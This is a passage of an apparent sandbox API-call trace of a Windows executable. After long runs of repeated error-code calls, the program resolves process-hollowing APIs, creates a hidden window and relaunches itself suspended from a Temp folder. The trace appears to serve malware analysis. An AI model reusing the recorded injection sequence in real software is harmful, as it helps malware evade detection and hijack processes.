(dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.436] SetLastError (dwErrCode=0x0) [0113.436] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.437] SetLastError (dwErrCode=0x0) [0113.437] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.438] SetLastError (dwErrCode=0x0) [0113.438] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.439] SetLastError (dwErrCode=0x0) [0113.439] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.440] SetLastError (dwErrCode=0x0) [0113.440] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.441] SetLastError (dwErrCode=0x0) [0113.441] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.442] SetLastError (dwErrCode=0x0) [0113.442] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.443] SetLastError (dwErrCode=0x0) [0113.443] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.444] SetLastError (dwErrCode=0x0) [0113.444] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.445] SetLastError (dwErrCode=0x0) [0113.445] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.446] SetLastError (dwErrCode=0x0) [0113.446] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.447] SetLastError (dwErrCode=0x0) [0113.447] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.448] GetLastError () returned 0x0 [0113.448] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.449] SetLastError (dwErrCode=0x0) [0113.449] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.450] SetLastError (dwErrCode=0x0) [0113.450] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] GetLastError () returned 0x0 [0113.451] SetLastError (dwErrCode=0x0) [0113.451] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0113.451] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0114.848] VirtualProtect (in: lpAddress=0x2d34c8, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0114.850] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0114.850] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0114.850] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0114.850] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0114.850] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0114.850] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0114.850] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0114.850] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0114.850] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0114.851] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0114.851] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0114.851] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0114.851] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0114.851] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0114.851] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0114.851] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0114.852] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0114.852] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0114.852] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x6019c [0114.956] PostMessageA (hWnd=0x6019c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0114.956] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0114.956] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0114.956] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x290000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe")) returned 0x30 [0114.956] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" [0114.956] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xde8, dwThreadId=0xdec)) returned 1 [0114.959] VirtualFree (lpAddress=0x290000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0114.959] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x290000 [0114.959] GetThreadContext (in: hThread=0x48, lpContext=0x290000 | out: lpContext=0x290000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd5000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, 